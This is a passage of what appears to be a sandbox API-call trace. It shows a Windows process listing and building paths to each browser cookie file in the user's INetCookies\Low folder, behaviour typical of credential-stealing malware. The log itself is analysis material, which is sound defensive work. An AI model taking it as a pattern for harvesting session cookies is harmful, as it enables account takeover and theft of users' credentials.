pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="L78EW25D.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\L78EW25D.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\L78EW25D.txt" [0251.429] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.429] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.429] lstrlenW (lpString="LC10XEWL.txt") returned 12 [0251.429] lstrlenW (lpString="*.txt") returned 5 [0251.430] wcscpy (in: _Dest=0x79cd8c8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.430] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.430] PathCombineW (in: pszDest=0x79cd8c8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="LC10XEWL.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LC10XEWL.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LC10XEWL.txt" [0251.430] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.430] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.430] lstrlenW (lpString="LVARU12Y.txt") returned 12 [0251.430] lstrlenW (lpString="*.txt") returned 5 [0251.430] wcscpy (in: _Dest=0x79cc7c8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.430] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.430] PathCombineW (in: pszDest=0x79cc7c8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="LVARU12Y.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LVARU12Y.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LVARU12Y.txt" [0251.430] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.430] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.430] lstrlenW (lpString="LY1NFEKN.txt") returned 12 [0251.430] lstrlenW (lpString="*.txt") returned 5 [0251.430] wcscpy (in: _Dest=0x79cdf28, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.430] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.430] PathCombineW (in: pszDest=0x79cdf28, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="LY1NFEKN.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LY1NFEKN.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LY1NFEKN.txt" [0251.430] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.430] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.431] lstrlenW (lpString="LY3FDU65.txt") returned 12 [0251.431] lstrlenW (lpString="*.txt") returned 5 [0251.431] wcscpy (in: _Dest=0x79cd488, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.431] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.431] PathCombineW (in: pszDest=0x79cd488, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="LY3FDU65.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LY3FDU65.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\LY3FDU65.txt" [0251.431] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.432] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.432] lstrlenW (lpString="M19117WZ.txt") returned 12 [0251.432] lstrlenW (lpString="*.txt") returned 5 [0251.432] wcscpy (in: _Dest=0x79ccd18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.432] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.432] PathCombineW (in: pszDest=0x79ccd18, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="M19117WZ.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\M19117WZ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\M19117WZ.txt" [0251.432] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.432] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.432] lstrlenW (lpString="MA5WDFBR.txt") returned 12 [0251.432] lstrlenW (lpString="*.txt") returned 5 [0251.432] wcscpy (in: _Dest=0x79cc8d8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.432] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.432] PathCombineW (in: pszDest=0x79cc8d8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="MA5WDFBR.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MA5WDFBR.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MA5WDFBR.txt" [0251.432] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.432] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.432] lstrlenW (lpString="MBJX4MYA.txt") returned 12 [0251.433] lstrlenW (lpString="*.txt") returned 5 [0251.433] wcscpy (in: _Dest=0x79cde18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.433] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.433] PathCombineW (in: pszDest=0x79cde18, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="MBJX4MYA.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MBJX4MYA.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MBJX4MYA.txt" [0251.433] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.433] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.433] lstrlenW (lpString="MCAKE788.txt") returned 12 [0251.433] lstrlenW (lpString="*.txt") returned 5 [0251.433] wcscpy (in: _Dest=0x79cc168, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.433] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.433] PathCombineW (in: pszDest=0x79cc168, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="MCAKE788.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MCAKE788.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MCAKE788.txt" [0251.433] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.433] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.433] lstrlenW (lpString="MIL4MU1S.txt") returned 12 [0251.433] lstrlenW (lpString="*.txt") returned 5 [0251.433] wcscpy (in: _Dest=0x79ccf38, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.433] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.433] PathCombineW (in: pszDest=0x79ccf38, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="MIL4MU1S.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MIL4MU1S.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MIL4MU1S.txt" [0251.433] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.433] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.433] lstrlenW (lpString="MM8KB9U2.txt") returned 12 [0251.433] lstrlenW (lpString="*.txt") returned 5 [0251.433] wcscpy (in: _Dest=0x79cd048, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.433] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.433] PathCombineW (in: pszDest=0x79cd048, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="MM8KB9U2.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MM8KB9U2.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MM8KB9U2.txt" [0251.433] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.433] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.433] lstrlenW (lpString="MMPF10F4.txt") returned 12 [0251.433] lstrlenW (lpString="*.txt") returned 5 [0251.434] wcscpy (in: _Dest=0x79cd158, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.434] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.434] PathCombineW (in: pszDest=0x79cd158, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="MMPF10F4.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MMPF10F4.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MMPF10F4.txt" [0251.434] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.434] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.434] lstrlenW (lpString="MOE7DCQU.txt") returned 12 [0251.434] lstrlenW (lpString="*.txt") returned 5 [0251.434] wcscpy (in: _Dest=0x79cc388, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.434] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.434] PathCombineW (in: pszDest=0x79cc388, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="MOE7DCQU.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MOE7DCQU.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MOE7DCQU.txt" [0251.434] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.434] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.434] lstrlenW (lpString="NEHE4KDB.txt") returned 12 [0251.434] lstrlenW (lpString="*.txt") returned 5 [0251.434] wcscpy (in: _Dest=0x79cd268, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.434] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.434] PathCombineW (in: pszDest=0x79cd268, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="NEHE4KDB.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NEHE4KDB.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NEHE4KDB.txt" [0251.434] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.434] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.434] lstrlenW (lpString="NOCAHPZ6.txt") returned 12 [0251.434] lstrlenW (lpString="*.txt") returned 5 [0251.434] wcscpy (in: _Dest=0x79cdbf8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.434] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.434] PathCombineW (in: pszDest=0x79cdbf8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="NOCAHPZ6.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NOCAHPZ6.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NOCAHPZ6.txt" [0251.434] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.434] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.434] lstrlenW (lpString="NYCCG1AV.txt") returned 12 [0251.434] lstrlenW (lpString="*.txt") returned 5 [0251.435] wcscpy (in: _Dest=0x79cd6a8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.435] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.435] PathCombineW (in: pszDest=0x79cd6a8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="NYCCG1AV.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NYCCG1AV.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NYCCG1AV.txt" [0251.435] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.435] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.435] lstrlenW (lpString="O8FFFI2K.txt") returned 12 [0251.435] lstrlenW (lpString="*.txt") returned 5 [0251.435] wcscpy (in: _Dest=0x79cd9d8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.435] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.435] PathCombineW (in: pszDest=0x79cd9d8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="O8FFFI2K.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\O8FFFI2K.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\O8FFFI2K.txt" [0251.435] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.435] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.435] lstrlenW (lpString="P778SMC9.txt") returned 12 [0251.435] lstrlenW (lpString="*.txt") returned 5 [0251.435] wcscpy (in: _Dest=0x79cdae8, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.435] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.435] PathCombineW (in: pszDest=0x79cdae8, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="P778SMC9.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\P778SMC9.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\P778SMC9.txt" [0251.435] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.435] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.435] lstrlenW (lpString="PF9HBAFQ.txt") returned 12 [0251.435] lstrlenW (lpString="*.txt") returned 5 [0251.435] wcscpy (in: _Dest=0x79cec18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.435] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.435] PathCombineW (in: pszDest=0x79cec18, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="PF9HBAFQ.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\PF9HBAFQ.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\PF9HBAFQ.txt" [0251.435] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.435] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.435] lstrlenW (lpString="PK3I34UV.txt") returned 12 [0251.436] lstrlenW (lpString="*.txt") returned 5 [0251.436] wcscpy (in: _Dest=0x79cee38, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.436] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.436] PathCombineW (in: pszDest=0x79cee38, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="PK3I34UV.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\PK3I34UV.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\PK3I34UV.txt" [0251.436] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.436] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.436] lstrlenW (lpString="QUMCK8L4.txt") returned 12 [0251.436] lstrlenW (lpString="*.txt") returned 5 [0251.436] wcscpy (in: _Dest=0x79cfd18, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.436] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 [0251.436] PathCombineW (in: pszDest=0x79cfd18, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="QUMCK8L4.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\QUMCK8L4.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\QUMCK8L4.txt" [0251.436] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.436] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.436] lstrlenW (lpString="RAYRHE6Z.txt") returned 12 [0251.436] lstrlenW (lpString="*.txt") returned 5 [0251.436] wcscpy (in: _Dest=0x79ce178, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.436] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff1005c) returned 0x0 [0251.436] PathCombineW (in: pszDest=0x79ce178, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low", pszFile="RAYRHE6Z.txt" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RAYRHE6Z.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\RAYRHE6Z.txt" [0251.436] FindNextFileW (in: hFindFile=0x44067a0, lpFindFileData=0x79c55b0 | out: lpFindFileData=0x79c55b0) returned 1 [0251.436] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.436] lstrlenW (lpString="RQK5QF4L.txt") returned 12 [0251.436] lstrlenW (lpString="*.txt") returned 5 [0251.436] wcscpy (in: _Dest=0x79cf058, _Source="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" | out: _Dest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low" [0251.436] StrRChrW (lpStart="*.txt", lpEnd=0x0, wMatch=0xfffffffffff2005c) returned 0x0 